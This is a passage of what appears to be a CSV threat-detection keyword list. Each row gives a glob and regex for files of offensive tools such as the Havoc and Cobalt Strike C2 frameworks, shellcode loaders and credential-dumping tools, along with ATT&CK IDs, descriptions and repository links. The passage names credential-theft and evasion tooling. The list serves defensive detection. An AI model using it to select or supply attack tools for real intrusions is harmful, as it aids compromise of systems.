tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*/Hack-Tools.git*",".{0,1000}\/Hack\-Tools\.git.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5452","618","2024-02-24T00:10:34Z","2020-06-22T21:42:16Z" "*/Hades.exe*",".{0,1000}\/Hades\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" 
"*/hades.git*",".{0,1000}\/hades\.git.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*/HadesLdr.git*",".{0,1000}\/HadesLdr\.git.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*/hades-main.zip*",".{0,1000}\/hades\-main\.zip.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*/hadoop-datanode-info.nse*",".{0,1000}\/hadoop\-datanode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hadoop-jobtracker-info.nse*",".{0,1000}\/hadoop\-jobtracker\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hadoop-namenode-info.nse*",".{0,1000}\/hadoop\-namenode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hadoop-secondary-namenode-info.nse*",".{0,1000}\/hadoop\-secondary\-namenode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hadoop-tasktracker-info.nse*",".{0,1000}\/hadoop\-tasktracker\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Hak5.sh*",".{0,1000}\/Hak5\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*/hakrawler.git*",".{0,1000}\/hakrawler\.git.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*/hancitor.profile*",".{0,1000}\/hancitor\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 
- TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/HandleHijacker.cpp*",".{0,1000}\/HandleHijacker\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*/HandleHijacker.hpp*",".{0,1000}\/HandleHijacker\.hpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*/handlekatz.py*",".{0,1000}\/handlekatz\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/HandleKatz_BOF*",".{0,1000}\/HandleKatz_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/HandleKatz_BOF","1","1","N/A","10","10","93","17","2021-10-12T21:38:02Z","2021-10-12T18:45:06Z" "*/HarmJ0y*",".{0,1000}\/HarmJ0y.{0,1000}","offensive_tool_keyword","Github Username","Co-founder of Empire. BloodHound. and the Veil-Framework | PowerSploit developer | krb lover | Microsoft PowerShell MVP | Security at the misfortune of others","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/HarmJ0y","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/HaryyUser.exe*",".{0,1000}\/HaryyUser\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/hash_spider.py*",".{0,1000}\/hash_spider\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/hashcat*",".{0,1000}\/hashcat.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/hashcat-rule.git*",".{0,1000}\/hashcat\-rule\.git.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","N/A","10","4","374","44","2024-04-02T12:03:31Z","2020-03-06T17:20:40Z" "*/hashdump_dc*",".{0,1000}\/hashdump_dc.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/hashesorg2019.gz*",".{0,1000}\/hashesorg2019\.gz.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*/Hashi0x/*",".{0,1000}\/Hashi0x\/.{0,1000}","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hashview.py*",".{0,1000}\/hashview\.py.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*/havex.profile*",".{0,1000}\/havex\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/Havoc.cpp*",".{0,1000}\/Havoc\.cpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/Havoc.qss*",".{0,1000}\/Havoc\.qss.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/Havoc.rc*",".{0,1000}\/Havoc\.rc.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/Havoc/data/*",".{0,1000}\/Havoc\/data\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/Havoc/main/*",".{0,1000}\/Havoc\/main\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/HavocFramework/*",".{0,1000}\/HavocFramework\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/HavocImages/*",".{0,1000}\/HavocImages\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/havoc-py/*",".{0,1000}\/havoc\-py\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/hbase-master-info.nse*",".{0,1000}\/hbase\-master\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hbase-region-info.nse*",".{0,1000}\/hbase\-region\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hddtemp-info.nse*",".{0,1000}\/hddtemp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hDendron.cs*",".{0,1000}\/hDendron\.cs.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*/HeapCrypt.git*",".{0,1000}\/HeapCrypt\.git.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","228","43","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*/HellHall.git*",".{0,1000}\/HellHall\.git.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","1","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" 
"*/HellsGate.git*",".{0,1000}\/HellsGate\.git.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","9","845","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*/HellsHall.exe*",".{0,1000}\/HellsHall\.exe.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","1","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*/Heroinn.git*",".{0,1000}\/Heroinn\.git.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*/Heroinn/*",".{0,1000}\/Heroinn\/.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*/heroinn_client/*",".{0,1000}\/heroinn_client\/.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*/hid_inject.*",".{0,1000}\/hid_inject\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/hid_sniff.*",".{0,1000}\/hid_sniff\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/HiddenDesktop.git*",".{0,1000}\/HiddenDesktop\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*/hijack_opener/*.js*",".{0,1000}\/hijack_opener\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/hijack_opener/*.rb*",".{0,1000}\/hijack_opener\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/HijackDLL-CreateRemoteThread.cpp*",".{0,1000}\/HijackDLL\-CreateRemoteThread\.cpp.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*/HijackDll-Process.cpp*",".{0,1000}\/HijackDll\-Process\.cpp.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*/HijackDLL-Threads.*",".{0,1000}\/HijackDLL\-Threads\..{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*/HijackHunter/*",".{0,1000}\/HijackHunter\/.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. 
